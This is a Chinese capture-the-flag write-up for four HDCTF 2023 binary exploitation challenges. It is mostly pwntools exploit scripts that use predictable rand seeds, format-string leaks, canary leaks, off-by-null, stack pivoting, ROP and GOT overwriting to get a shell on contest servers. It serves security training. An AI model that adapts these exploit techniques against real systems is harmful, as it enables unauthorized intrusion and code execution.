HDCTF_2023

pwnner

附件

有后门函数，seed是一个固定值，

//伪随机数
#include <stdio.h>
#include <stdlib.h>
int main()
{
	int b;
	srand(0x39);
	for (size_t i = 0; i <1; i++)
	{
		b = rand() ;
		printf("%d ", b); #1956681178
	}
	return 0;
}

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

p = remote('node1.anna.nssctf.cn',28067)

p.sendafter("name:\n",'1956681178')

payload = 'a'*0x48 +p64(0x4008B3)

p.sendlineafter("next?\n",payload)

p.interactive()

KEEP ON

附件 普通的栈迁移，用格式字符串漏洞泄露old_rbp ,

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

p=remote('node4.anna.nssctf.cn',28609)

p.sendafter(": \n",'%16$p')

p.recvuntil('0x')

rbp = int(p.recv(12),16)

print(hex(rbp)) 

payload ="aaaaaaaa" +p64(0x4008d3)+p64(rbp-0x60+0x20)+p64(0x4005e0)+'/bin/sh\x00'

payload = payload.ljust(0x50,'a') +p64(rbp-0x10-0x50)+p64(0x4007f2)

p.recvuntil("keep on !\n")

p.send(payload)

p.interactive()

Makewish

附件 没有种子函数，默认为0，用gdb调试或用第一题的伪随机数脚本可以得到随机数，

用puts泄露canary，off by null 漏洞，覆盖rbp最后一字节为\x00,实现栈迁移

即使exp是真确的，也不能保证百分百一次性打通，

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

p = remote('node4.anna.nssctf.cn',28727)

system = 0x4007Cb

ret = 0x4005d9

p.sendafter("name\n\n",b'a'*0x29)

p.recvuntil('a'*0x29)

canary = u64(p.recv(7).rjust(8,'\x00'))

print(hex(canary))

p.sendafter("key\n\n",p32(0x000002c3))  #由于read只能读四个字节，不能用sendline,

payload = p64(ret)*10 +p64(system)+p64(canary)

p.sendafter("welcome to HDctf,You can make a wish to me\n",payload)

p.interactive()

Minions

附件 计算偏移，用%d$n (d:表示十进制数) 往key写数据，或者用fmtstr_payload{偏移，{key:数据}}

这道题用栈迁移迁到0x6010C0,是不可行的，因为0x6010C0离非rw段太近了

          0x600000           0x601000 r--p     1000     #非rw段
          0x601000           0x602000 rw-p     1000

我将介绍两种方法解决这道题目

方法一

栈循环一次，栈迁移到更高的地方

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

p = remote('node1.anna.nssctf.cn',28190)
#p = process('./4')
elf = ELF('./4')
def d():
  gdb.attach(p)
  pause()

bss = elf.bss(0xe00)

rdi = 0x400893

leave_ret = 0x400758

key = 0x6010A0

again = 0x4007DE

system = 0x4005c0

binsh = 0x6010C8

payload = '%102c%8$n'+'a'*7 +p64(key)

p.sendlineafter("Welcome to HDCTF.What you name?\n\n",payload)

payload = 'a'*0x30 +p64(bss+0x30)+p64(again)

p.sendafter("welcome,tell me more about you\n",payload)

p.sendlineafter("That's great.Do you like Minions?\n",'/bin/sh\x00')

payload = p64(rdi)+p64(binsh)+p64(system)

payload = payload.ljust(0x30,'\x00')+p64(bss-8)+p64(leave_ret)

p.sendafter("welcome,tell me more about you\n",payload)

p.sendlineafter("That's great.Do you like Minions?\n",'/bin/sh\x00'*5)

p.interactive()

方法二

栈循环两次，将printf_got修改为system

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

p = remote('node1.anna.nssctf.cn',28627)

elf = ELF('./4')

key = 0x6010A0

main  =0x4007Ae 

system = 0x4005c0

payload = '%102c%8$n'+'a'*7 +p64(key)

p.sendlineafter("Welcome to HDCTF.What you name?\n\n",payload)

payload2 = 'a'*0x38+p64(main)

p.sendafter("welcome,tell me more about you\n",payload2)

p.sendafter("That's great.Do you like Minions?\n",'/bin/sh\x00')

payload = fmtstr_payload(6,{elf.got['printf']:system})

p.sendafter("Welcome to HDCTF.What you name?\n\n",payload)

p.sendafter("welcome,tell me more about you\n",payload2)

p.sendafter("That's great.Do you like Minions?\n",'/bin/sh\x00')

p.sendafter("Welcome to HDCTF.What you name?\n\n",'/bin/sh\x00')

p.interactive()